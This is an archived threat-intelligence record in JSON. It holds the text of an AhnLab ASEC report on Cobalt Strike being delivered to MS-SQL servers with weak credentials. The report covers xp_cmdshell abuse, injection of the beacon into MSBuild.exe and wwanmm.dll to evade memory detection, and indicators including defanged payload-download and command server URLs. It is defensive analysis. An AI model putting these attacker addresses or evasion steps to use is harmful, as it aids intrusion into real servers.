{
	"id": "f1fb3ec9-b365-4834-b0fb-ff07512c2f11",
	"created_at": "2026-04-06T00:11:47.817365Z",
	"updated_at": "2026-04-10T03:24:23.917362Z",
	"deleted_at": null,
	"sha1_hash": "0185e56b0a0bbac28ae51efc875421cc39c4d86c",
	"title": "Cobalt Strike Being Distributed to Unsecured MS-SQL Servers - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1852301,
	"plain_text": "Cobalt Strike Being Distributed to Unsecured MS-SQL Servers -\r\nASEC\r\nBy ATCP\r\nPublished: 2022-02-10 · Archived: 2026-04-02 11:44:25 UTC\r\nThe ASEC analysis team has recently discovered the distribution of Cobalt Strike targeting unsecured MS-SQL\r\nservers.\r\nMS-SQL server is a typical database server of the Windows environment, and it has consistently been a target of\r\nattack from the past. Attacks that target MS-SQL servers include attacks to the environment where its vulnerability\r\nhas not been patched, brute forcing, and dictionary attack against poorly managed servers.\r\nThe attacker or the malware usually scans port 1433 to check for MS-SQL servers open to the public. It then\r\nperforms brute forcing or dictionary attacks against the admin account, a.k.a. “sa” account to attempt logging in.\r\nEven if the MS-SQL server is not open to the public, there are types such as Lemon Duck malware that scans port\r\n1433 and spreads for the purpose of lateral movement in the internal network.\r\nhttps://asec.ahnlab.com/en/31811/\r\nPage 1 of 4\n\nManaging admin account credentials so that they’re vulnerable to brute forcing and dictionary attacks as above or\r\nfailing to change the credentials periodically may make the MS-SQL server the main target of attackers. Other\r\nmalware besides Lemon Duck that target MS-SQL server includes CoinMiner malware such as Kingminer and\r\nVollgar.\r\nIf the attacker succeeds to log in to the admin account through these processes, they use various methods\r\nincluding the xp_cmdshell command to execute the command in the infected system. Cobalt Strike that has\r\nrecently been discovered was downloaded through cmd.exe and powershell.exe via the MS-SQL process as shown\r\nbelow.\r\nCobalt Strike is a commercial penetration testing tool, and it is recently being used as a medium to dominate the\r\ninternal system in the majority of attacks including APT and ransomware. Malware that has recently been\r\ndiscovered is an injector that decodes the encoded Cobalt Strike inside, and executes and injects the normal\r\nprogram MSBuild.exe.\r\nhttps://asec.ahnlab.com/en/31811/\r\nPage 2 of 4\n\nCobalt Strike that is executed in MSBuild.exe has an additional settings option to bypass detection of security\r\nproducts, where it loads the normal dll wwanmm.dll, then writes and executes a beacon in the memory area of the\r\ndll. As the beacon that receives the attacker’s command and performs the malicious behavior does not exist in a\r\nsuspicious memory area and instead operates in the normal module wwanmm.dll, it can bypass memory-based\r\ndetection.\r\nAlthough it is not certain in which method the attacker dominated MS-SQL and installed the malware, as the\r\ndetection logs of Vollgar malware that was previously mentioned were discovered, it can be assumed that the\r\ntargeted system had inappropriately managed the account credentials.\r\nAhnLab’s ASD infrastructure shows numerous logs of Cobalt Strike over the past month. Seeing that the\r\ndownload URLs and the C\u0026C server URL are similar, it appears that most of the attacks were by the same\r\nattacker. IOC of Cobalt Strike over the month is shown in the list below.\r\nAhnLab products are equipped with process memory-based detection method and behavior-based detection\r\nfeature that can counter the beacon backdoor which is used from the Cobalt Strike’s initial invasion stage to\r\nspread internally.\r\nhttps://asec.ahnlab.com/en/31811/\r\nPage 3 of 4\n\n[File Detection]\r\n– Trojan/Win.FDFM.C4959286 (2022.02.09.00)\r\n– Trojan/Win.Injector.C4952559 (2022.02.04.02)\r\n– Trojan/Win.AgentTesla.C4950264 (2022.02.04.00)\r\n– Infostealer/Win.AgentTesla.R470158 (2022.02.03.02)\r\n– Trojan/Win.Generic.C4946561 (2022.02.01.01)\r\n– Trojan/Win.Agent.C4897376 (2022.01.05.02)\r\n– Trojan/Win32.CobaltStrike.R329694 (2020.11.26.06)\r\n[Behavior Detection]\r\n– Malware/MDP.Download.M1197\r\nMD5\r\nae7026b787b21d06cc1660e4c1e9e423\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//103[.]243[.]26[.]225/Acrobat[.]exe\r\nhttp[:]//92[.]255[.]95[.]90[:]81/owa\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/31811/\r\nhttps://asec.ahnlab.com/en/31811/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/31811/"
	],
	"report_names": [
		"31811"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434307,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0185e56b0a0bbac28ae51efc875421cc39c4d86c.pdf",
		"text": "https://archive.orkl.eu/0185e56b0a0bbac28ae51efc875421cc39c4d86c.txt",
		"img": "https://archive.orkl.eu/0185e56b0a0bbac28ae51efc875421cc39c4d86c.jpg"
	}
}